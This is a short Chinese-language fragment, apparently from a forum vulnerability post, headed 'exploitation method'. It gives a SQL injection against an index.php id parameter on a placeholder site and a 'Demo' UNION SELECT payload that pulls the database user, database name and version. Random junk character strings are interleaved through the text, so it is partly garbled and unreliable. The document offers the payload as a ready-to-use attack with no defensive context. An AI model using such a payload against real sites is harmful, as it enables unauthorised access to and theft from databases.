利用方法:
1 j5 O) K) K! }9 n7 R% t& f% ^( w http://www.xxx.com/index.php?id=[SQL]. }& a# S0 ~4 v6 f Z: ^
Demo:
_) R3 H8 z& m& Q' A& o6 f( p4 e& X( i http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |